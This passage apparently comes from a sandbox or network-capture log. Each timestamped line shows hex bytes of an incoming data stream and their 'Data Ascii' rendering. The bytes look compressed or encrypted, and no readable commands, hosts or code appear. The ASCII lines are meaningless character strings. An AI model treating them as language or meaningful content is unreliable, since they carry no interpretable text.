                                                                                                                                  2023-07-18 15:37:06 UTC1072INData Raw: e7 7b 56 33 b9 e2 b7 d6 5e 15 32 ea a1 49 40 1f ff 31 49 b0 95 fa 3e 58 5a 02 24 0d 13 04 5d a3 e5 29 6f 59 9d f4 be ca 7d c3 08 db 89 96 34 84 17 e9 58 aa ac fa 7b b5 ab 49 94 b9 89 6d 8f 1d cd 68 ca 56 a7 2e 70 75 d0 16 53 4c 22 a5 13 77 13 21 30 97 cb 35 75 47 34 8b d8 50 d8 2b 30 7f db b3 de 5e 56 54 62 21 1a 8f 23 e6 65 c7 24 04 b6 e5 2b 84 0a 5d 38 7d be 56 11 ae 1d 13 0a d0 d2 da 76 e1 a5 a0 67 7d 69 a7 8a d4 b7 b4 5a 8a a5 86 eb 58 0b 61 d5 2d 96 35 cd b7 4b 00 af 6d 3d f8 02 b2 b6 b5 33 fb 53 37 ac 8c 47 1b 0b 29 fc 92 4a d9 8d f1 55 a9 1c 18 61 9b e1 5b 1d a8 46 7d a7 d9 28 70 86 48 de 3d 51 5d c6 c3 58 ef 4e d8 d4 fd 27 8d 77 ed 43 e3 33 2f fd 7b b7 32 a0 09 da 04 e3 4b 67 20 40 e2 69 b3 a5 13 1c 04 66 0a 77 64 4c 2e 6f 80 de 32 5c 14 28 23 44
                                                                                                                                  Data Ascii: {V3^2I@1I>XZ$])oY}4X{ImhV.puSL"w!05uG4P+0^VTb!#e$+]8}Vvg}iZXa-5Km=3S7G)JUa[F}(pH=Q]XN'wC3/{2Kg @ifwdL.o2\(#D
                                                                                                                                  2023-07-18 15:37:06 UTC1088INData Raw: a8 e0 c0 47 62 44 3b 6c ae 94 39 b9 df 43 4c 75 a6 8b 90 3e 8e ce 85 ca 1e 8b a5 b7 47 fb b6 db b4 4d 0c 32 c2 4b 93 5b 05 f2 7e 8d 35 e9 a0 d8 e4 a3 d1 e5 bd 6f 70 f6 b5 ae 5d 10 9e 46 a6 74 f0 16 ed f0 85 c8 e0 a3 09 6f a6 52 52 09 20 ff 56 85 58 1b 95 c8 bc f7 e8 52 af 0a 16 44 5a ff 9c 47 7e a8 95 58 f5 c9 c8 71 92 6f 50 b3 21 1c 3a ec e8 01 1c ea fd 86 11 41 4c 66 4c 71 36 eb 63 26 cb 4d f0 41 5a 66 01 12 40 da 84 05 5e a5 9e 85 de df 9a 45 9f 45 00 d9 4d e0 a8 76 8e 04 6b 3e 57 c4 d8 40 ad b1 46 bd a2 5e 96 a9 7e c5 f4 aa 02 4b 27 20 8c 40 58 c1 6a f6 ae 38 ae cc 7a cf 22 15 02 07 7d 07 46 9b e0 39 e9 31 60 34 bc 4f 18 d3 02 0f a4 5c db 33 66 69 34 6d 89 48 d9 0a 36 32 32 b1 d5 b2 e7 0b 00 d0 73 06 33 f1 c5 3b 37 08 d0 cf 7e 75 77 dc 0f ac 0d 2c ec
                                                                                                                                  Data Ascii: GbD;l9CLu>GM2K[~5op]FtoRR VXRDZG~XqoP!:ALfLq6c&MAZf@^EEMvk>W@F^~K' @Xj8z"}F91`4O\3fi4mH622s3;7~uw,
                                                                                                                                  2023-07-18 15:37:06 UTC1104INData Raw: e4 47 04 12 45 30 ed 35 2d 9f 96 40 b1 ad d8 2f 0c 49 1d f9 b5 46 51 62 11 59 ef 89 e5 9e a4 53 a8 d8 a8 9b 12 a5 9d 89 32 76 98 f6 80 09 ef cc 9c 50 57 fb 7c e0 96 d0 0a c6 bd 30 9a 28 a9 ee da 9b cd 2a 72 13 38 11 30 15 4e 57 c0 16 e5 24 5b a3 a5 2b f9 20 90 95 dc c1 74 d1 a3 f0 a3 20 3c af 18 64 c0 1f e6 2f 23 78 80 07 50 a8 f2 bd 3d 1c a5 d0 5c cd f8 52 aa 33 ee 28 45 3a 60 53 e4 77 88 b5 29 f5 74 5d 31 0b 6b 8d f3 70 f2 76 2f 07 35 5c 60 2a c4 b9 b3 26 f6 89 2b a5 15 42 9e 37 09 f4 27 8a 62 d7 60 e2 c9 57 50 82 af d5 46 c9 7c cd 81 f6 e7 94 df 49 0d b2 ac 4d 83 16 91 8b 3c 61 fe c1 44 1d fc 51 53 f7 e9 2f 87 ca cc 19 41 a4 8d b8 80 8d 10 8e 97 2e ff eb 84 7d 6c 2a 14 7d 95 bc af 6d 59 6d ec c4 d6 6b 72 47 ad c5 59 4c 1a ad 7a b5 a5 88 7d b1 ad ef 59
                                                                                                                                  Data Ascii: GE05-@/IFQbYS2vPW|0(*r80NW$[+ t <d/#xP=\R3(E:`Sw)t]1kpv/5\`*&+B7'b`WPF|IM<aDQS/A.}l*}mYmkrGYLz}Y
                                                                                                                                  2023-07-18 15:37:06 UTC1120INData Raw: 39 58 2f 79 cc be 1a 52 e2 cc 76 af 3a 9c 6c b8 94 2c 2f ce 8c 39 82 3b 0e 21 a2 ce af b1 2e 2c e0 63 eb 02 51 98 b8 b3 fb 36 86 6b 3c f5 36 1c d8 f3 80 9e 23 50 cb 6b b4 69 17 de 6d de 66 53 1d 8e 57 aa 0d 78 e3 8f a8 16 d5 de f5 9d df b6 41 25 7a 1b b2 db d2 50 f5 ed d4 09 46 c8 c1 8b 1e 5b 2b 72 5f a4 f2 20 d3 22 74 80 11 bc cd 0f df cb f4 85 1e 3a 81 a5 1a 7e ef 04 b5 b5 80 d5 87 7e 6c 8e 30 db 01 25 e2 5f 3f b3 ad 80 d1 94 7c 29 d2 59 21 30 af b2 3b 62 bd 57 26 91 d2 df 1f 95 4a 03 c8 67 32 dd 36 d3 84 db 74 fd b9 fe ab 7a 9d 37 a7 1f 3f a2 22 3e 22 75 27 07 52 c9 50 90 7d c1 7e f4 21 49 f8 a2 d4 b2 0e a3 3c 79 00 9b de c5 28 0d 27 c0 dd ec 8a 53 97 79 1c 5b 91 9e 13 2c 45 b3 27 7f 19 eb 85 fb 14 50 b3 a0 1a 90 d2 49 a9 f3 b1 ac d0 fa ce 15 d6 d3 07
                                                                                                                                  Data Ascii: 9X/yRv:l,/9;!.,cQ6k<6#PkimfSWxA%zPF[+r_ "t:~~l0%_?|)Y!0;bW&Jg26tz7?">"u'RP}~!I<y('Sy[,E'PI
                                                                                                                                  2023-07-18 15:37:06 UTC1136INData Raw: ad d8 9a be fd e8 f9 2c f9 aa 4d ca 04 e7 83 3a c5 7d ab 7f 31 95 d6 93 36 4b 13 56 88 f8 1f 82 4d 73 3d 82 9b e4 c6 2c 74 1e 93 27 73 b3 d8 f1 c7 84 fe f4 f1 66 ae 67 f2 05 f7 b6 f5 9b f6 36 ae 28 1c c0 a2 83 73 2c 12 c1 05 37 41 8e ee 45 19 3c 86 a0 8f 08 75 27 7d f5 d7 f1 50 c9 cc ce 99 a9 b9 63 cc dd 68 4f 53 32 0f 98 ee a4 d2 9f 01 fb 14 7a f7 2c 8e 78 6a 38 ea 26 31 63 6c 56 ae 4b 03 ea 72 b1 9b 3d 6b 4b 5f ed bf 59 92 3b 1e 9f 24 01 fc ff 49 2e 05 88 fe 8d 30 71 b6 8d cf 0e 50 f5 61 43 f7 d9 02 d0 f0 67 46 3c 35 39 26 35 cb 1a e8 4a 4c 9f 18 5f 5a ba 00 bc a0 89 14 40 8c 76 8d f9 cf f1 20 25 36 9a 0e d7 d3 ce 54 02 2e e0 f6 2e 1a 0f 85 a6 fc 3b f7 03 0c b4 a1 fa 03 60 f9 98 dd 44 79 95 ed 09 54 7a c5 ba eb 46 e8 5d 11 1c a2 3c 3a 36 57 bc 1e ff 13
                                                                                                                                  Data Ascii: ,M:}16KVMs=,t'sfg6(s,7AE<u'}PchOS2z,xj8&1clVKr=kK_Y;$I.0qPaCgF<59&5JL_Z@v %6T..;`DyTzF]<:6W
                                                                                                                                  2023-07-18 15:37:06 UTC1152INData Raw: 96 4d a2 7a b4 1b 27 40 d7 9d 89 d5 70 c2 92 d7 44 5c 02 36 cb 69 b2 11 52 af 82 0d 9f d9 76 1f 32 74 a8 a4 d7 96 3f ed 98 c0 31 8d 2b cc a1 98 08 00 5c 8d 2f 03 03 8d 2f b9 96 ca d4 50 14 3a 54 cf a1 02 ea fb 66 3b c5 f0 d6 d3 e1 7f 45 0d f0 b5 cb 12 73 48 5f 4a 53 dd 7c fb 37 a6 31 b5 f0 fd 29 4a 47 0a 94 cb a5 67 e5 31 b1 c1 e5 69 4a 9d d7 e6 c2 ee 74 f9 ac 3d 6c 6b 09 dd 89 3b bf 66 d3 21 ce b5 00 8a 80 86 d3 b1 dd 33 a7 b1 f8 d2 77 f3 85 df b3 ce f5 3d 8c 05 a5 a9 b1 e4 4c c6 80 1d 54 82 e2 eb 0a 88 eb e5 51 54 76 e3 33 d2 1c 7a 7d a8 d2 ae 87 a8 21 1a 38 fa 14 9f 6f ef a3 e2 99 e8 d7 47 2a 78 fb f7 12 e7 29 c5 02 ee e6 7a 3f 84 2e 01 08 50 80 e5 93 47 59 0e c0 1d ee dd 6d c8 f3 06 ae 67 cd f0 ea b8 10 db da 4f ed c7 48 a0 5e 94 d3 c0 58 b4 af b6 6d
                                                                                                                                  Data Ascii: Mz'@pD\6iRv2t?1+\//P:Tf;EsH_JS|71)JGg1iJt=lk;f!3w=LTQTv3z}!8oG*x)z?.PGYmgOH^Xm
                                                                                                                                  2023-07-18 15:37:06 UTC1168INData Raw: eb 7e e6 29 33 aa b6 70 c7 f3 ca f8 c9 08 aa c6 52 d6 d3 90 f6 fb 19 f8 5a 5a 8e ac f2 be 88 85 87 13 23 ab 7d 9f fa 3f aa 0a 62 3d 51 72 16 d6 b1 d1 33 2d c3 9b 7e 55 79 b5 f6 45 ff 07 6b 4a 6e 82 70 ae 53 22 8b 8c 4c 93 bf 66 60 23 8f 25 a2 16 e1 c9 22 68 ca 49 e6 df 0b 9a 35 e6 de 2a 4e 89 e2 0e d9 1e db f0 53 51 39 9f 1f 42 77 88 37 df 7c 84 65 4b 93 8e 20 9b 65 27 ad 5a 2f 29 4c da fb e7 95 e6 ca 87 4c 49 c9 93 f8 b0 0e b7 3c 90 6e f9 8d bb 09 13 4e 3c d6 6e 30 3c b8 25 21 e0 8c 6a f8 b8 95 eb 96 41 73 0d b8 cf 48 1b 43 15 62 3a 6f 63 77 1f d5 15 70 1a d9 0c 26 9a 19 94 b7 1f 74 46 4e a8 03 eb 40 8b b9 ab 0b ad 51 5e 9b 25 42 ce b1 6a 40 84 4a c4 00 b3 35 2a d7 9a e6 04 b2 6a b5 23 19 3e ba 89 81 62 33 8d a3 d3 b6 f6 a1 10 c4 43 5c e5 49 ba 8f ef 04
                                                                                                                                  Data Ascii: ~)3pRZZ#}?b=Qr3-~UyEkJnpS"Lf`#%"hI5*NSQ9Bw7|eK e'Z/)LLI<nN<n0<%!jAsHCb:ocwp&tFN@Q^%Bj@J5*j#>b3C\I
                                                                                                                                  2023-07-18 15:37:06 UTC1184INData Raw: bb 33 33 eb da e1 d6 3c 47 a0 da 92 de e7 7e e2 a2 c7 f5 de d4 7d 06 bf c6 c1 35 05 69 33 3b 34 a2 30 eb 54 27 3d bd ac ac d0 27 e3 5f 26 b7 e9 e3 79 08 49 7a c4 7e c5 e8 38 b7 fe 12 7d db d7 44 d4 99 9b 22 f9 cc 94 a4 39 bf 28 ae 65 7b ca dd fe 54 0f e5 be dd 17 b2 32 ec 65 1c 56 41 5f f6 21 0e bb 08 db e3 41 d7 69 14 48 d9 8b a2 94 05 04 bf 06 f9 43 c4 33 4b ff 94 91 0e 81 39 d3 70 0e a5 fb c5 3b c1 cb 92 2b 41 f6 32 c5 2c 5e d8 fb 5b e8 d0 a2 42 55 3f ef 06 4f 9f cf 9a a6 29 44 68 6d 39 83 92 17 83 95 83 ac 43 9d cf 0c 27 17 61 8a b2 a7 78 35 9c 41 13 b1 34 cf 78 9c e9 57 70 87 d0 10 4d 86 b6 ea e8 92 d2 19 27 98 2b 15 55 a5 d2 97 21 41 60 c1 f7 5e e5 4b ea 37 27 1f ce 44 78 d0 2b f8 b7 d8 49 04 12 a6 4b e8 7f 5b 3f a6 02 4b ee 74 04 f5 5e 61 cf 7c f0
                                                                                                                                  Data Ascii: 33<G~}5i3;40T'='_&yIz~8}D"9(e{T2eVA_!AiHC3K9p;+A2,^[BU?O)Dhm9C'ax5A4xWpM'+U!A`^K7'Dx+IK[?Kt^a|
                                                                                                                                  2023-07-18 15:37:06 UTC1200INData Raw: 14 79 f9 82 50 ae 21 af c8 7c a4 a3 c0 56 41 88 92 d8 04 9d 17 4f 99 1b 08 2b 3d bb bf 74 04 58 b5 e3 97 dc 58 39 bf c3 da 1e 08 3b 8a 23 c0 3a 86 34 ad 00 02 8d 29 39 d1 97 80 c1 59 d9 0c 45 79 dc f8 2c 62 3a 2b 1c e9 4b 05 2a 76 28 b7 bc c2 93 b1 9f be 53 1b 20 42 9e b1 17 c8 f1 3c 88 1c eb ae 8f dc b5 e1 e0 b3 a0 4c 02 65 95 5d c2 eb 8a 7d 95 16 47 a7 a2 f7 17 24 72 89 51 a3 d7 22 24 fa c5 74 50 39 28 72 94 5f 2e d1 31 80 ea d3 dc ae be 9f 8a 99 20 7f d7 f9 a3 ee d7 81 f0 84 99 d8 0a 59 35 7f f3 79 1c 09 ef 32 9e 09 5d e4 d1 b5 1e 78 94 40 65 2b 6a 5c 09 99 24 8e 46 29 e1 21 2b 83 6a b6 31 e6 4b c1 cf da ce 64 36 40 ef d7 bb 71 c6 d4 75 3b 49 90 c7 86 68 e9 d0 7d 35 c2 64 50 8e 3d c9 0d 1e 15 d5 95 ac 7c a9 88 b9 46 3e cf 35 09 fd 7d 0a b7 ec 08 df 27
                                                                                                                                  Data Ascii: yP!|VAO+=tXX9;#:4)9YEy,b:+K*v(S B<Le]}G$rQ"$tP9(r_.1 Y5y2]x@e+j\$F)!+j1Kd6@qu;Ih}5dP=|F>5}'
                                                                                                                                  2023-07-18 15:37:06 UTC1216INData Raw: 87 71 27 e6 b7 ad ba 9c 13 12 dc 1f bd e6 d9 ef 1e 57 e6 53 4e 7b 44 13 20 4c d4 4e 2f aa 55 1a 6e 85 49 c4 a0 2e 0f 04 6c 95 27 ab 4d 14 e0 61 b1 0c 3e 84 81 c8 f4 27 c8 5b 67 e6 10 e8 37 44 f9 43 93 1b 6c 8c ca e3 a7 7b 73 c0 c9 6e c4 f1 04 3b b1 94 2d f7 0a 45 79 bc b4 86 f3 68 dd 27 d8 23 8b 1d 9e 1d 3a 91 7d 89 0b c4 07 6b 49 c1 25 85 e6 4f b8 b0 db db 3e b9 2c a9 47 26 d6 0c 85 09 72 5c 4e c6 80 e3 1e 10 ee 4f a7 92 06 07 bc f5 af c8 ca 94 16 64 9a 24 cf be 4c 73 81 24 7e 19 2a 3a 2c 92 e4 26 5c c3 56 2c d2 4f bb 28 05 96 f9 f5 ea 12 e2 29 1f 54 6b c5 da ad dc 72 53 72 2e 42 d9 4d 6f b1 7c 9c c2 c0 bb 35 ac 54 40 b5 31 5e af 44 09 55 35 f9 50 82 cf 0a 4f ad b0 be 3e c7 0e a0 ed 1f af 4b d0 cf 53 dd 1d b6 a1 17 da 20 7c c4 ef ab 51 57 b1 cd 1a d5 55
                                                                                                                                  Data Ascii: q'WSN{D LN/UnI.l'Ma>'[g7DCl{sn;-Eyh'#:}kI%O>,G&r\NOd$Ls$~*:,&\V,O()TkrSr.BMo|5T@1^DU5PO>KS |QWU
                                                                                                                                  2023-07-18 15:37:06 UTC1232INData Raw: 68 9f ac 98 8b ab 0e d2 c6 3a c3 98 46 bd fb 52 9e 3c 34 43 e6 24 5d 08 02 1e 1d 95 01 07 a9 17 ea b5 55 91 d8 92 22 67 d0 5b 95 c0 e9 a5 7a 10 69 64 91 9e 44 c7 b3 90 b9 dc a5 50 4d e9 80 48 1a 82 bd f5 e6 88 b0 1f eb a2 f5 a6 30 89 b4 76 95 be 1d 1f da 06 5a 7e 86 8a 4f c6 48 03 85 89 70 af 6d 05 e2 36 6f c4 e8 dc 41 c0 a0 f0 ef a1 f7 5c 95 6e e7 e5 b4 8b 3c 33 ec 5b a4 f5 34 c3 14 66 ba e3 ea ac e3 71 40 2b 64 16 b3 58 16 af 3f 5d 33 69 20 3a 04 66 24 c9 c5 37 f3 b5 b5 ba 2c 65 da c2 3a 6e da ba 1d fd da 4d bf 98 0a 59 5f 7b 5f 29 a8 be 13 b7 f6 44 cf 9e c5 a1 b4 c9 04 ce dc 10 cc 14 c6 c7 82 e0 44 0b 2c 45 85 6d 39 2e 43 74 a5 6f ac e4 44 01 28 29 50 af d1 8d c4 c1 6f b4 24 ff 43 46 04 67 2a 09 91 8d d8 12 bd 92 c1 11 0f 5b 27 a3 8a 81 6a 07 40 8f 3c
                                                                                                                                  Data Ascii: h:FR<4C$]U"g[zidDPMH0vZ~OHpm6oA\n<3[4fq@+dX?]3i :f$7,e:nMY_{_)DD,Em9.CtoD()Po$CFg*['j@<
                                                                                                                                  2023-07-18 15:37:06 UTC1248INData Raw: 08 8e 6d 83 3f 60 0a 6e f4 c2 ec 1e 7e a0 79 39 5e fc 9c 4a d8 7c 45 4a e8 2d c4 de 47 a2 8d 54 1b 8d d9 a1 2d 53 a5 8b 42 de 36 1c cd eb b1 4f 17 f5 08 30 58 7d 6c 18 4d 5c aa 19 23 c4 9a 16 85 c1 f4 83 26 95 a1 52 6f 32 5a bf 64 3e f2 83 6d 49 90 00 f5 a9 74 b9 cc 6b 5e 07 50 f2 b9 7d 85 27 6e 61 23 16 59 94 63 5c 06 a9 35 08 f8 c8 fc fb b7 8e 18 2a 90 a7 1a da 81 81 aa e9 91 0b 62 a3 96 72 c2 01 9f 06 39 7c 32 5d ab 47 95 40 40 8b 14 23 d2 6e ba 4a 5e a1 60 26 ec d6 c9 9e d2 53 79 f5 35 d7 41 21 31 24 93 ce 39 72 1b fa 7c 5a ec e2 9b dc ec 8d 69 c2 a2 05 aa 43 63 1a 09 74 fa 17 53 b1 29 77 67 41 14 d9 b6 63 45 f5 ed 6c 1a ec c3 de 8c 1f b2 b5 86 2a 82 ec 6c 48 f8 28 0f b7 66 dd d4 a5 4f 94 79 d5 5a fe a2 7d 27 1f 26 0e ae a5 45 bc 24 bc f4 b3 46 ab 66
                                                                                                                                  Data Ascii: m?`n~y9^J|EJ-GT-SB6O0X}lM\#&Ro2Zd>mItk^P}'na#Yc\5*br9|2]G@@#nJ^`&Sy5A!1$9r|ZiCctS)wgAcEl*lH(fOyZ}'&E$Ff
                                                                                                                                  2023-07-18 15:37:06 UTC1264INData Raw: 67 1e a2 6d ac 1b 3d 7b f6 d4 d7 26 b9 e7 38 8c 3e 64 e1 a3 87 0c 05 ee 70 22 cb b1 42 6b a7 14 ce 6e c2 5e a8 f9 23 78 c3 32 db bd ca d9 80 be 02 22 ec e4 75 0b 7b af c8 bc 07 9c b5 f5 b5 e6 45 13 05 93 c5 66 d4 83 2e a0 41 c7 b9 a4 38 af 8b d6 20 a6 50 ef 84 af 1a 9b 2b 5c 7b 1d 46 0c a3 6a 02 be 4e c2 59 1d 67 60 0d 5a bd f7 63 61 ef 6a c9 51 61 59 9f cb 79 44 00 98 81 04 79 85 1b 4f 0a f7 21 fa 7b ec 47 c8 dc 45 6e 2b e3 81 b0 c6 df 6d 50 6a e6 bc 85 35 b1 d6 dc 2b 91 29 0c 9a 1d 71 c5 09 50 23 da b8 d6 37 90 6f 10 60 4f 21 93 eb 92 8c de de 0c 1a e8 c5 83 82 be 46 fc ae 3c 6d 91 c0 19 64 ad fd de e5 00 50 44 8b 58 1e d6 2d d1 dc 8e 75 89 08 99 1f 74 fd f3 73 b7 70 00 27 ea 0d 05 16 2b 2f 6a 1e 2e 2c 15 41 13 30 e6 01 f5 f2 33 e9 0f 34 16 01 88 05 96
                                                                                                                                  Data Ascii: gm={&8>dp"Bkn^#x2"u{Ef.A8 P+\{FjNYg`ZcajQaYyDyO!{GEn+mPj5+)qP#7o`O!F<mdPDX-utsp'+/j.,A034
                                                                                                                                  2023-07-18 15:37:06 UTC1280INData Raw: 5b 35 fb 36 a0 ae 58 57 3a de 81 24 c9 4d 89 6c b2 80 d6 e2 9a 65 a2 ce e6 83 0c fe 44 5b 65 96 c4 33 c5 cd c5 9d c8 dc e8 32 02 2d 33 1f 90 ed 5d fc d0 45 99 64 51 5f 95 77 0b 28 41 11 cb 26 ab 6a f2 da b2 72 be 57 9f 73 d8 44 09 6f 58 bc b5 6f 7c f8 61 69 84 2c 4f d3 c0 c6 d0 31 ee c8 a8 19 10 52 bb ad ff ff 33 11 df ef 0d 94 06 3c 05 9e c4 88 a4 1c e7 c9 90 50 c6 18 bf 9a 01 ef a1 ea 03 3b 24 c8 11 2b 21 b0 5a a2 e3 c0 e9 d9 56 24 21 d9 e1 46 2a e6 57 4a c3 30 b2 3d 1d 6d 69 0f 24 59 e0 15 42 e3 92 56 e1 67 24 25 ca 26 16 08 ed b3 3a 6e 99 d5 29 0d 07 45 48 f2 d1 07 75 6c fc ac 04 c7 46 9a 6d 62 f4 34 a2 1d fa 88 e7 ce b5 6b 58 8f 41 5a ba c1 87 6a bf e6 de 2c ac d9 36 1e c2 36 dc 75 9f 1c 70 c0 18 79 f9 63 b8 89 92 43 38 e8 0f ab 3e 85 e1 e4 3d 65 f5
                                                                                                                                  Data Ascii: [56XW:$MleD[e32-3]EdQ_w(A&jrWsDoXo|ai,O1R3<P;$+!ZV$!F*WJ0=mi$YBVg$%&:n)EHulFmb4kXAZj,66upycC8>=e
                                                                                                                                  2023-07-18 15:37:06 UTC1296INData Raw: ac bc af ec 88 03 b8 b7 c0 5f 8c 0e 4c e4 96 5f 8e 00 27 9e b8 5f cc 18 b0 09 cf 7f ba f8 5e 2f d1 14 b5 fd b3 03 6b 48 aa b5 32 e2 ea a3 9e 7b 74 ae 1f 5c 64 a1 4a 97 76 6a 7a ad e2 ea d9 0c fb 4a b9 13 0d 2b 2d 3c 4a b3 96 51 de a5 5d e1 f0 2e c8 a8 4e 45 3f 8a 2d fc 37 93 1a 0c 87 23 f9 04 37 86 92 a4 74 17 b8 f6 53 77 36 ad 79 67 80 71 cb 96 18 2b bb 2b 25 4e e6 e6 44 fa c0 87 1e cd 7e 60 03 ee 5a 5f af 21 f4 52 a0 32 23 ef 29 8d 0b b0 9f ec 7c 55 0f ec df 45 04 ad 9b 9b 0f 6d b3 0a 01 85 66 ed e9 d3 44 4c 74 b0 24 dc da 39 42 34 18 0e 0a cb 46 e4 d6 a9 01 3f 25 53 9a dc c3 f3 84 5f 55 17 cd b6 cd 0c 54 b3 98 bf 7d bc 12 dd 37 00 9b 41 1f 9e 7e ac 13 76 df 6d f9 42 95 dc 04 27 bd 75 40 16 ff 0b 0d 9a 31 8e cb 67 e5 bf d9 5b b7 d4 da 99 b0 21 4f bc 59
                                                                                                                                  Data Ascii: _L_'_^/kH2{t\dJvjzJ+-<JQ].NE?-7#7tSw6ygq++%ND~`Z_!R2#)|UEmfDLt$9B4F?%S_UT}7A~vmB'u@1g[!OY
                                                                                                                                  2023-07-18 15:37:06 UTC1312INData Raw: b0 76 3f 38 79 d7 04 a5 2a 8b c8 6f 50 ea 2c 9a c0 a0 f9 4c 27 61 b5 ba c4 32 33 fe 3d 83 a0 b6 f3 9c 0f c8 51 06 a2 44 ad c8 2b cb 1f 00 a1 af b2 b5 ab 79 f1 d1 f3 0c c6 ad 36 fa 8e aa 65 2b 9f d0 0b 52 ed c9 5f dd 7f 2e 33 99 ea 37 fd dc 3f 03 c7 b1 4d 06 af f1 63 66 60 dd 06 e4 f9 2b 65 06 1a fe 50 8a 7f 70 3e 71 9f 6b 59 a0 1d e2 40 54 db 01 36 6a 45 46 05 da 39 46 a3 71 54 5e 71 aa 9d dd 2e ac 49 e1 eb 92 b2 33 58 58 29 f5 69 28 75 03 54 37 3c 92 54 aa 8e 57 4f 60 7f dd d7 f9 28 57 d7 ef f0 1e 3b 26 4e 14 ee 5e c4 19 a7 8a 87 23 cc e9 f8 9f 36 78 28 b8 c2 e9 1f 55 37 38 07 9c 4e 5f bd ca 0e 86 67 7b 59 e4 0e 1e 3a 25 c6 2f b5 4f ae e9 85 ac 9e 64 45 c2 e3 ff b8 f2 48 59 56 78 50 31 bb b7 c3 06 72 a3 2c 44 99 14 79 47 ce 5a e6 79 a3 f0 8f 4b 33 c3 03
                                                                                                                                  Data Ascii: v?8y*oP,L'a23=QD+y6e+R_.37?Mcf`+ePp>qkY@T6jEF9FqT^q.I3XX)i(uT7<TWO`(W;&N^#6x(U78N_g{Y:%/OdEHYVxP1r,DyGZyK3
                                                                                                                                  2023-07-18 15:37:06 UTC1328INData Raw: aa a8 cf 01 f6 6d e7 59 26 f1 a1 14 2c 1e 61 7e 7b ad 7e db bf 4d 58 1b aa 1e b7 f3 7f 49 2f e8 22 3f 26 5d 5b 03 6a b1 65 e6 c4 23 12 44 14 29 6f 53 fb 4e 19 fe 17 41 a3 74 f5 d0 22 d5 cc 3f a2 fc b1 20 d2 c8 99 88 12 6d 38 55 c7 fc 2c e5 e1 d0 db 2f 37 70 8d c3 09 c9 c2 65 7b ba 4a db b9 86 1a 8e 03 b6 00 b9 8e 36 8e 9a b6 46 a8 6a 5e a2 ed 7a 4c 43 6d 43 c5 c1 0c 25 8f fc 9a 13 50 ef bd 4c 91 7c ce 6c 72 7d 51 52 44 79 a9 dd c2 74 80 ba c9 71 1b e8 69 de c8 78 46 5d 1a de 99 e8 fb 3a 32 88 8e c3 0b c5 03 31 12 46 b4 aa ae c7 18 18 c6 29 0c aa 73 f4 c9 0a f7 f8 ed 57 9f 76 7d bc 68 67 ca 27 c9 fe bb 4c 74 09 cd 65 c9 c4 f1 61 e4 6f 43 de 90 c2 90 f7 43 14 19 33 2c 54 62 14 b1 65 55 1a 4b 61 78 83 18 76 c8 2d e4 69 6c 1a 97 46 38 95 e9 0e 60 07 4f 8c ab
                                                                                                                                  Data Ascii: mY&,a~{~MXI/"?&][je#D)oSNAt"? m8U,/7pe{J6Fj^zLCmC%PL|lr}QRDytqixF]:21F)sWv}hg'LteaoCC3,TbeUKaxv-ilF8`O
                                                                                                                                  2023-07-18 15:37:06 UTC1344INData Raw: 6f 8b a7 a4 d7 ab 1e c0 96 88 fc 1a 52 d8 20 09 b0 43 bd 20 0d 4b 46 7b 19 50 81 6c 6c a3 87 53 42 96 21 7b 7a c3 1e db ef e5 95 c2 3d d4 dd f1 34 64 69 09 d2 32 e2 dd 2b 90 52 cf 6a 0d c9 2a 3b bf 6b 93 6d e7 e8 0c e7 af 5e a8 e5 9f 0c 3b e6 63 66 bb fb 10 23 4b 65 3f 8b 3d 7a 2b 23 ce bb cb da d5 24 f9 ef b6 5f b5 a4 7e 0e a2 f8 ca e5 fa 04 11 1f b0 20 c7 14 70 a4 8e 98 f7 75 01 2e d1 2a 3f 9b 6e 21 99 04 09 5e 03 8a 4c 16 06 44 37 00 ca cb d3 bb eb 26 81 d1 2e 44 71 4d 08 a5 53 df 48 9c 7e cd 98 9c 4a fd 8a bc ad 01 00 91 8a fc d3 7c c4 92 a4 9b 07 78 ae bc 3b d5 b6 04 1e 92 b1 7d b8 f0 e0 57 fb 1a db d9 82 0f 52 09 5c 2f 5c dc c3 ef 2e cf 7f 9a b4 fc f0 c1 f9 c0 0d c5 c6 8a c5 6b 2e 8c 3a 5c 40 7e 3c d3 78 3b 49 ed d8 b1 38 09 14 11 2d ea b6 e5 c5 30
                                                                                                                                  Data Ascii: oR C KF{PllSB!{z=4di2+Rj*;km^;cf#Ke?=z+#$_~ pu.*?n!^LD7&.DqMSH~J|x;}WR\/\.k.:\@~<x;I8-0
                                                                                                                                  2023-07-18 15:37:06 UTC1360INData Raw: f1 ce 90 b4 f0 a6 5e 7a 8c 68 a4 9a 4b 75 47 7d f5 e7 ff 1b 99 93 4d 83 c7 ae 92 74 00 dd 48 ca b1 a3 39 d4 b9 f7 2b ba 04 b9 f8 97 13 8d 49 28 9f 52 51 08 2d 01 94 0a ec 8c 0b 8c 25 28 37 6b 9e 82 8a fe 7a ed 0c 4f 09 10 55 27 98 b6 b9 e0 99 2c 43 3e 4e 66 a9 0a 89 87 8d 27 7f c7 9b 9d 42 3c 0a 09 83 57 0f db 1d 63 c9 cf ba eb b3 cf d1 ec 0a b8 78 23 ac e0 dc 83 15 ee e0 f0 32 3b ca aa 4c 9e 6b ae 4b 5d c9 6b e4 2c ed 83 e6 6b 53 ff d9 dd 8b f6 f2 7e 2d df f4 07 aa 2a 41 b5 a9 45 ff 49 76 eb 94 e3 a6 d5 c9 75 4c 81 a4 0e 15 9e 39 a3 81 70 10 f8 3a 08 53 c5 b8 5f 3e 09 8a d9 3d 58 d8 6e 93 10 ba 58 44 f7 ff fc 80 d1 9d 09 c7 f7 0a e3 2e d8 5c 7c 56 83 3f 48 01 97 d9 60 9f a3 1f 8b 6f ad 12 b2 6a fd 53 02 3c df 04 17 b4 25 0a 02 92 49 c8 8a ab b1 18 68 04
                                                                                                                                  Data Ascii: ^zhKuG}MtH9+I(RQ-%(7kzOU',C>Nf'B<Wcx#2;LkK]k,kS~-*AEIvuL9p:S_>=XnXD.\|V?H`ojS<%Ih
